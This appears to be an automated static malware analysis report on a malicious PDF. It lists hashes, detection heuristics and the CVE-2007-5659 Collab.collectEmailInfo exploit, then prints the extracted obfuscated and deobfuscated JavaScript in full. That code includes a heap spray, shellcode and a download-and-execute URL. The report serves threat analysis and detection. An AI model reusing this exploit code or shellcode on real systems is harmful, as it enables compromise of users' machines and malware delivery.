Malicious PDF — malware analysis report

Static analysis result for SHA-256 ae778c87e3a4e18b…

MALICIOUS

PDF

8.3 KB First seen: 2026-05-08
MD5: 9473e7da71b2013f87a3fe490ffd2de6 SHA-1: 47179a7ee903046681addc36dc0c792f42e03ae6 SHA-256: ae778c87e3a4e18beb66fdaea56aae207692b8932798018c070260ed7c171ee9
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript files, including 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', suggest obfuscation techniques were used. The primary function of the script appears to be downloading and executing a secondary payload, a common tactic for malware delivery. Due to the obfuscation and lack of specific indicators, the exact family remains unknown.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var r_DFKNgVrTe_n = new Array();var t__Eb_N_5kx7 = 0;var H_4k_U = "";function o_P_h_21a__3_4(h_Ok_5h0Hk, RWoR_1u16){var TNE54_DB = RWoR_1u16.toString();var s5G6__P = "";for(var b_j_e6_d47413 = 0; b_j_e6_d47413 < TNE54_DB.length; b_j_e6_d47413++) {var Y6u__aO_4_r = parseInt(TNE54_DB.substr(b_j_e6_d47413, 1));if (!isNaN(Y6u__aO_4_r)) {Y6u__aO_4_r = Y6u__aO_4_r.toString(16);if (Y6u__aO_4_r.length == 1) { Y6u__aO_4_r = "0" + Y6u__aO_4_r; }else if (Y6u__aO_4_r.length != 2) { Y6u__aO_4_r = "00"; }s5G6 …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://googleinru.in/cgi-bin/etn/z002106201r0019R57191a34X6b1e33fdY6c69ca46Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1BA8 1798 bytes
SHA-256: 5cac0ec22d63e47f789ea14600ca6d1d00a354aa70dc7b6726e34d9b0b4e7c48
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function A1Di_51dNOdL(e_c2AeXfkF_1, I_j1etoa){var IR0a8_JQ__WMuvN = 4;var wW4_atrUx_PK5Ol = new Array();var D4d_I1G__bGFFo = new Array(107,256,11,  512, 106, 11,  44,40, 33);D4d_I1G__bGFFo[5] += 12;var y__S8HLU__2qe = "";try {var CW60ewNYQ = 0;if (app) {I_j1etoa = pr[CW60ewNYQ].subject;}} catch(e) {}if (!e_c2AeXfkF_1) { wW4_atrUx_PK5Ol[0] = 0;wW4_atrUx_PK5Ol[1] = wW4_atrUx_PK5Ol[0];wW4_atrUx_PK5Ol[2] = wW4_atrUx_PK5Ol[1];wW4_atrUx_PK5Ol[3] = wW4_atrUx_PK5Ol[2];var YN4__o = D4d_I1G__bGFFo[6] + 3;var b8g3W1_JoD_u_46 = YN4__o + 11;var T___Hi = A1Di_51dNOdL;var Gv_NY3R4C40d = 0;T___Hi = T___Hi.toString();for(var mQ_26f_pGR___S = 0; mQ_26f_pGR___S < T___Hi.length; mQ_26f_pGR___S++) {var Q_kNu_Shu = T___Hi.charCodeAt(mQ_26f_pGR___S);if (Q_kNu_Shu > YN4__o && Q_kNu_Shu < b8g3W1_JoD_u_46) {if (Gv_NY3R4C40d == 4) {Gv_NY3R4C40d = 0;}wW4_atrUx_PK5Ol[Gv_NY3R4C40d] += Q_kNu_Shu;if (wW4_atrUx_PK5Ol[Gv_NY3R4C40d] > D4d_I1G__bGFFo[3]) {wW4_atrUx_PK5Ol[Gv_NY3R4C40d] -= 512;}Gv_NY3R4C40d++;}}}else  { wW4_atrUx_PK5Ol = e_c2AeXfkF_1;}for (var nu_L_3L = 0; nu_L_3L < 4; nu_L_3L++) {if (wW4_atrUx_PK5Ol[nu_L_3L] > D4d_I1G__bGFFo[1]) {wW4_atrUx_PK5Ol[nu_L_3L] -= D4d_I1G__bGFFo[1];}}var K__8DLa = 0;var cJc2_fp_CJr = 0;var y__HJ_86__cl0;var BPn51W3_D_8vj_b = 0;while ( K__8DLa < I_j1etoa.length ) {var d_1_O_5 = "";d_1_O_5 = I_j1etoa.substr(K__8DLa, 2);var odd_UKSX8i = parseInt(d_1_O_5, D4d_I1G__bGFFo[5]); if (cJc2_fp_CJr == 4) {cJc2_fp_CJr = 0;}odd_UKSX8i -= (BPn51W3_D_8vj_b + 2) * wW4_atrUx_PK5Ol[cJc2_fp_CJr];if (odd_UKSX8i < 0) {odd_UKSX8i -= Math.floor(odd_UKSX8i / D4d_I1G__bGFFo[1]) * D4d_I1G__bGFFo[1];}y__S8HLU__2qe += String.fromCharCode(odd_UKSX8i);{K__8DLa += 2;BPn51W3_D_8vj_b++;cJc2_fp_CJr++;}}var R_I71_1F = this;R_I71_1F["eval"](y__S8HLU__2qe);return 0;}

	A1Di_51dNOdL(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4916 bytes
SHA-256: deb1d88f551c091455022f117d94ff8a1c4728bc2854fd04a3d5677e80b3431e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var r_DFKNgVrTe_n = new Array();var t__Eb_N_5kx7 = 0;var H_4k_U = "";function o_P_h_21a__3_4(h_Ok_5h0Hk, RWoR_1u16){var TNE54_DB = RWoR_1u16.toString();var s5G6__P = "";for(var b_j_e6_d47413 = 0; b_j_e6_d47413 < TNE54_DB.length; b_j_e6_d47413++) {var Y6u__aO_4_r = parseInt(TNE54_DB.substr(b_j_e6_d47413, 1));if (!isNaN(Y6u__aO_4_r)) {Y6u__aO_4_r = Y6u__aO_4_r.toString(16);if (Y6u__aO_4_r.length == 1) { Y6u__aO_4_r = "0" + Y6u__aO_4_r; }else if (Y6u__aO_4_r.length != 2) { Y6u__aO_4_r = "00"; }s5G6__P = Y6u__aO_4_r + s5G6__P;}}while(s5G6__P.length < 8) { s5G6__P = "0" + s5G6__P; }var j42Qy_6_Ns1K = h_Ok_5h0Hk.toString(16);if (j42Qy_6_Ns1K.length == 1) { j42Qy_6_Ns1K = "0" + j42Qy_6_Ns1K; }else if (j42Qy_6_Ns1K.length != 2) { j42Qy_6_Ns1K = "00"; }s5G6__P = "3" + j42Qy_6_Ns1K + "P" + s5G6__P;return s5G6__P;}function x2RusW_NX_wF3(YLOP_7_d, MT3__jiw){var WjOF0QW__R = new Array("");var t7bYwljQt13_g_n = YLOP_7_d;var d7I7Ij;if ((d7I7Ij = YLOP_7_d.lastIndexOf("%u00")) != -1) {if (d7I7Ij + 6 == YLOP_7_d.length) {WjOF0QW__R[0] = YLOP_7_d.substr(d7I7Ij + 4, 2);t7bYwljQt13_g_n = YLOP_7_d.substring(0, d7I7Ij);}}d7I7Ij = 1;for (b_j_e6_d47413 = 0; b_j_e6_d47413 < MT3__jiw.length; b_j_e6_d47413++) {var D7rFQ85_l0E3V_6 = MT3__jiw.charCodeAt(b_j_e6_d47413).toString(16);if (D7rFQ85_l0E3V_6.length == 1) { D7rFQ85_l0E3V_6 = "0" + D7rFQ85_l0E3V_6; }WjOF0QW__R[d7I7Ij] = D7rFQ85_l0E3V_6;d7I7Ij++;}b_j_e6_d47413 = WjOF0QW__R[0].length ? 0 : 1;WjOF0QW__R[d7I7Ij] = "00";WjOF0QW__R[d7I7Ij + 1] = "00";d7I7Ij += 2;if ((WjOF0QW__R.length - b_j_e6_d47413) % 2) {WjOF0QW__R[d7I7Ij] = "00";}while(b_j_e6_d47413 < WjOF0QW__R.length) {t7bYwljQt13_g_n += "%u" + WjOF0QW__R[b_j_e6_d47413 + 1] + WjOF0QW__R[b_j_e6_d47413];b_j_e6_d47413 += 2;}t7bYwljQt13_g_n += "%u0000";return t7bYwljQt13_g_n;}function c_1_C_6SI10t_i(V1_gljT6, MPM_up){while (V1_gljT6.length*2<MPM_up) {V1_gljT6 += V1_gljT6;}V1_gljT6 = V1_gljT6.substring(0,MPM_up/2);return V1_gljT6;}function DkT3__231(AU__01J_36, q__pb0W4_us4, p0iis5x){var BWH_HC__Fg_82 = 0x0c0c0c0c;var V1_gljT6 = unescape(q__pb0W4_us4);var MT3__jiw = o_P_h_21a__3_4(AU__01J_36, p0iis5x);var g_ooCdB = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var YLOP_7_d = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4870%u4849%u0045%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3552%u3137%u3139%u3361%u5834%u6236%u6531%u3333%u6466%u3659%u3663%u6339%u3461%u5a36%u3130%u3030%u3066%u3036";app.VFFLh_2c8Q = unescape(x2RusW_NX_wF3(YLOP_7_d, MT3__jiw));var L_N__K5_v0p = 0x400000;var dgJ448f_Wu__d2 = g_ooCdB.length * 2;var MPM_up = L_N__K5_v0p - (dgJ448f_Wu__d2+0x38);V1_gljT6 = c_1_C_6SI10t_i(V1_gljT6, MPM_up);var H__Q5_6L = (BWH_HC__Fg_82 - 0x400000)/L_N__K5_v0p;for (var Bgo___o = 0; Bgo___o < H__Q5_6L; Bgo___o++) {r_DFKNgVrTe_n[Bgo___o] = V1_gljT6 + g_ooCdB;}}function ex5_CW2_21_dg(){var uCPb13_c_Yn_y6F = "";for (b_j_e6_d47413 = 0; b_j_e6_d47413 < 12; b_j_e6_d47413++) {uCPb13_c_Yn_y6F += unescape("%u0c0c%u0c0c");}var BH2__g_K = "";for (b_j_e6_d47413 = 0; b_j_e6_d47413 < 750; b_j_e6_d47413++) {BH2__g_K += uCPb13_c_Yn_y6F;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: BH2__g_K});app.clearTimeOut(t__Eb_N_5kx7);}function r3w67n(sb0_uX_7_K0){var kmP8tq_X_M_1P = t__Eb_N_5kx7;if ((sb0_uX_7_K0 >= 8 && sb0_uX_7_K0 < 8.11) || sb0_uX_7_K0 < 7.1) {DkT3__231(23, "%u0c0c%u0c0c", sb0_uX_7_K0);ex5_CW2_21_dg();}if (kmP8tq_X_M_1P) {app.clearTimeOut(kmP8tq_X_M_1P);}}var p0iis5x = 0;var P6_1P2FdJ6_X = app.plugIns;for (var FsO_vk = 0; FsO_vk < P6_1P2FdJ6_X.length; FsO_vk++) {var V_a5uBN8TRt = P6_1P2FdJ6_X[FsO_vk].version;if (V_a5uBN8TRt > p0iis5x) { p0iis5x = V_a5uBN8TRt; }}if (app.viewerVersion == 9.103 && p0iis5x < 9.13) {p0iis5x = 9.13;}app.E_RE_V0_4t = r3w67n;t__Eb_N_5kx7 = app.setTimeOut("app.E_RE_V0_4t(" + p0iis5x.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.